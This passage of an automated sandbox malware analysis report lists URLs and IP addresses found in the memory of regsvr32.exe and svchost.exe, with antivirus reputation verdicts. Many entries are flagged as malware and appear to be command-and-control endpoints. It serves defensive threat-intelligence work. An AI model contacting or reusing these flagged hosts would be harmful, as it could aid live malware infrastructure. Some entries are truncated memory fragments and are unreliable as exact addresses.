                      https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX100%Avira URL Cloudmalware
                      https://58.227.42.236/N0%Avira URL Cloudsafe
                      https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg(100%Avira URL Cloudmalware
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://58.227.42.236/c40%Avira URL Cloudsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://185.157.82.211/100%Avira URL Cloudmalware
                      https://79.172.212.216:8080/nes100%Avira URL Cloudmalware
                      https://51.91.76.89/100%Avira URL Cloudmalware
                      https://79.172.212.216:8080/.100%Avira URL Cloudmalware
                      https://79.172.212.216/100%Avira URL Cloudmalware
                      https://46.55.222.11/TBwKHjQjVeCWIQFSi100%Avira URL Cloudmalware
                      https://206.188.212.92/X100%Avira URL Cloudmalware
                      https://160.16.218.63:8080/lksHycwarnaSRJQsEAZwtocdkTVZGajE100%Avira URL Cloudmalware
                      https://120.50.40.183/100%Avira URL Cloudmalware
                      https://159.8.59.82/100%Avira URL Cloudmalware
                      https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawrlp100%Avira URL Cloudmalware
                      https://58.227.42.236:80/$v6/0%Avira URL Cloudsafe
                      https://58.227.42.236:80/D0%Avira URL Cloudsafe
                      https://192.99.251.50/27.42.236/h100%Avira URL Cloudmalware
                      https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg$v6/100%Avira URL Cloudmalware
                      https://46.55.222.11/TBwKHjQjVeCWIQFSN100%Avira URL Cloudmalware
                      https://103.221.221.247/Certificates100%Avira URL Cloudmalware
                      https://58.227.42.236:80/:0%Avira URL Cloudsafe
                      https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOa100%Avira URL Cloudmalware
                      https://206.188.212.92/7100%Avira URL Cloudmalware
                      https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOT100%Avira URL Cloudmalware
                      https://185.157.82.211:8080/cal100%Avira URL Cloudmalware
                      https://120.50.40.183:80/$v6/100%Avira URL Cloudmalware
                      https://185.157.82.211:8080/r100%Avira URL Cloudmalware
                      https://206.188.212.92/100%Avira URL Cloudmalware
                      https://58.227.42.236:80/-0%Avira URL Cloudsafe
                      https://173.254.208.91/100%Avira URL Cloudmalware
                      https://160.16.218.63/100%Avira URL Cloudmalware
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://149.56.128.192/100%Avira URL Cloudmalware
                      https://159.8.59.82:8080/AgctwBgxIsTEnzPyqHwVtfcFB100%Avira URL Cloudmalware
                      https://www.tiktok.com/legal/report0%URL Reputationsafe
                      https://103.221.221.247/Global100%Avira URL Cloudmalware
                      https://79.172.212.2167:8080/0%Avira URL Cloudsafe
                      https://120.50.40.183:80/za100%Avira URL Cloudmalware
                      https://46.55.222.11/100%Avira URL Cloudmalware
                      https://46.55.222.11/TBwKHjQjVeCWIQFS)100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://120.50.40.183/d100%Avira URL Cloudmalware
                      https://160.16.218.63:8080/5100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLEr100%Avira URL Cloudmalware
                      https://58.227.42.236:80/0%Avira URL Cloudsafe
                      https://103.221.221.247/100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE100%Avira URL Cloudmalware
                      https://120.50.40.183/m100%Avira URL Cloudmalware
                      https://103.221.221.247:8080/i100%Avira URL Cloudmalware
                      https://79.172.212.216:8080/100%Avira URL Cloudmalware
                      https://185.157.82.211:8080/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      time.windows.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://46.55.222.11/TBwKHjQjVeCWIQFStrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyXtrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://51.91.76.89:8080/WUUUrykRKzQgKnGAgOWXwbTPpbZjnbjXYyUgItVQHAlMtltfregsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://51.91.7.5/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                        • 17%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://206.188.212.92:8080/WvwiYegTHwVudezOCrWPjYKhpMeUQepregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000E.00000002.314141397.000001ECDFA4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313769610.000001ECDFA47000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://58.227.42.236/regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://79.172.212.216:8080/VNwOftDFidReElfWGyCwgbregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://192.99.251.50/njigQUBviBvfjJoFmpOFCcuxzCMjisKOYgnAJJuZGrOYExdzIkjfPaaGvSwrlpregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://46.55.222.11/.50.40.183:80/YQXxdxwQWLyBEVjMOlgtyregsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://120.50.40.183/rosoftregsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPregsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://51.91.7.5:8080/EEsdElRrfqZScZWLqBhRqLStregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://103.221.221.247:8080/regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://192.99.251.50/:regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314134200.000001ECDFA42000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://192.99.251.50/Fregsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPKregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://192.99.251.50/regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bingmapsportal.comsvchost.exe, 0000000E.00000002.314090796.000001ECDFA13000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://131.100.24.231/regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000E.00000003.313809959.000001ECDFA56000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://46.55.222.11/TBwKHjQjVeCWIQFSzregsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX-regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://crl.ver)svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421495587.0000015C89EEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://58.227.42.236/Nregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314090796.000001ECDFA13000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg(regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://%s.xboxlive.comsvchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		low
                                            https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://58.227.42.236/c4regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://dynamic.tsvchost.exe, 0000000E.00000003.313761832.000001ECDFA63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://185.157.82.211/regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://79.172.212.216:8080/nesregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://51.91.76.89/regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://79.172.212.216:8080/.regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://79.172.212.216/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://46.55.222.11/TBwKHjQjVeCWIQFSiregsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://206.188.212.92/Xregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://160.16.218.63:8080/lksHycwarnaSRJQsEAZwtocdkTVZGajEregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://120.50.40.183/regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://159.8.59.82/regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawrlpregsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://58.227.42.236:80/$v6/regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://58.227.42.236:80/Dregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://192.99.251.50/27.42.236/hregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg$v6/regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314134200.000001ECDFA42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://46.55.222.11/TBwKHjQjVeCWIQFSNregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://103.221.221.247/Certificatesregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://58.227.42.236:80/:regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOaregsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://206.188.212.92/7regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOTregsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://185.157.82.211:8080/calregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://120.50.40.183:80/$v6/regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://185.157.82.211:8080/rregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://206.188.212.92/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://58.227.42.236:80/-regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://173.254.208.91/regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://160.16.218.63/regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://www.hotspotshield.com/terms/svchost.exe, 00000017.00000003.392127513.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.391991165.0000015C8A795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392087236.0000015C8A792000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392152187.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392175741.0000015C8AC03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392461273.0000015C8AC19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392344061.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392106913.0000015C8A7A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
